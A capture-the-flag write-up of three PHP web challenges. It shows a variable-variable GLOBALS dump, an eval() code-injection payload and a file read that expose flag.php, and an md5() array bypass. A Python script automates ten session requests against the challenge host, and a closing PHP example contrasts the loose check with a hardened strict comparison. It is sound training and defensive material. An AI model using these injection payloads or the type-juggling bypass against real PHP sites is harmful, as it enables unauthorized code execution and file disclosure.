-
Blast-1 :
Open the link; it's 502.
I appended a parameter directly to the URL: ?a=1
This outputs a piece of code.
The var_dump() call uses $$a (a variable variable), so the superglobal GLOBALS may be used.
Pass GLOBALS as the value of the hello parameter.
Get the flag.
-
Blast-2 :
Open the link.
var_dump() prints the type and value of a variable.
eval() executes a string as PHP code.
There are two ways to get the flag:
1:?hello=file('flag.php')
2:?hello=);show_source('flag.php');var_dump(
-
Blast-3 :
Open the link; again it shows PHP code:
<?php
error_reporting(0);
session_start();
require('./flag.php');
if(!isset($_SESSION['nums'])){
    $_SESSION['nums'] = 0;
    $_SESSION['time'] = time();
    $_SESSION['whoami'] = 'ea';
}
if($_SESSION['time']+120<time()){
    session_destroy();
}
$value = $_REQUEST['value'];
$str_rand = range('a', 'z');
$str_rands = $str_rand[mt_rand(0,25)].$str_rand[mt_rand(0,25)];
if($_SESSION['whoami']==($value[0].$value[1]) && substr(md5($value),5,4)==0){
    $_SESSION['nums']++;
    $_SESSION['whoami'] = $str_rands;
    echo $str_rands;
}
if($_SESSION['nums']>=10){
    echo $flag;
}
show_source(__FILE__);
?>
Key points:
The value of the variable $str_rands is 2 random lowercase letters.
If $_SESSION['whoami'] equals the value built from the value parameter ($value[0].$value[1]), and the 4 characters of md5($value) starting at offset 5 loosely compare equal to 0, nums increases by 1 and whoami is updated to the new random pair, which is echoed in the response. Once nums is at least 10, the flag is printed.
An array bypasses the md5 check, because md5() returns null when given an array, and null==0.
The first request passes ?value[]=ea
The second request passes the pair echoed by the first response, for example ?value[]=mj, and so on.
You can write a Python script to automate it:
import requests

# One session object, so the PHP session cookie (nums, whoami) persists
s = requests.session()
url = "http://b9998c89f8054c61b75dcf6d48d1d164707c9299b7f949f4.game.ichunqiu.com/?value[]=ea"
r = s.get(url)
for i in range(10):
    # The first two characters of the response are the new whoami value
    url_1 = "http://b9998c89f8054c61b75dcf6d48d1d164707c9299b7f949f4.game.ichunqiu.com/?value[]=" + r.text[:2]
    r = s.get(url_1)
    print(r.url)
    if 'flag{' in r.text:
        print(r.text)
Run result:
Get the flag.
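The md5() array bypass from the Blast-3 key points, seen from the defending side: an added PHP example (not the challenge's code) that reproduces the loose check beside a strict version. The function names weak_check and strict_check are hypothetical, and reading the intended test as "four '0' characters at offset 5" is an assumption.

```php
<?php
// Added example, not the challenge's code. Function names are hypothetical.

// The page's condition, reproduced to show why an array satisfies it.
function weak_check($whoami, $value): bool
{
    try {
        // PHP 5/7: md5(array) warns and returns null, substr() of that is
        // false, and the loose comparison false == 0 is true.
        return $whoami == (@$value[0] . @$value[1])
            && @substr(@md5($value), 5, 4) == 0;
    } catch (TypeError $e) {
        // PHP 8: md5() rejects an array with a TypeError instead.
        return false;
    }
}

// Hardened form: validate the type first, then compare strings strictly.
// Assumption: the intended test is four '0' characters at offset 5.
function strict_check(string $whoami, $value): bool
{
    // $_REQUEST values can be arrays; accept only a plain string.
    if (!is_string($value) || strlen($value) < 2) {
        return false;
    }
    // hash_equals() compares string to string, with no type juggling.
    return hash_equals($whoami, substr($value, 0, 2))
        && hash_equals('0000', substr(md5($value), 5, 4));
}

// Constructed sample inputs: what PHP hands the script for each query form.
$whoami = 'ea';
$cases = [
    'array  (?value[]=ea)' => ['ea'],
    'string (?value=ea)'   => 'ea',
];
foreach ($cases as $label => $value) {
    printf(
        "%-22s weak=%s strict=%s\n",
        $label,
        var_export(weak_check($whoami, $value), true),
        var_export(strict_check($whoami, $value), true)
    );
}
```

The array case passes weak_check on PHP 5/7 and is rejected by strict_check on every version; on PHP 8 the original script would stop with an uncaught TypeError at md5().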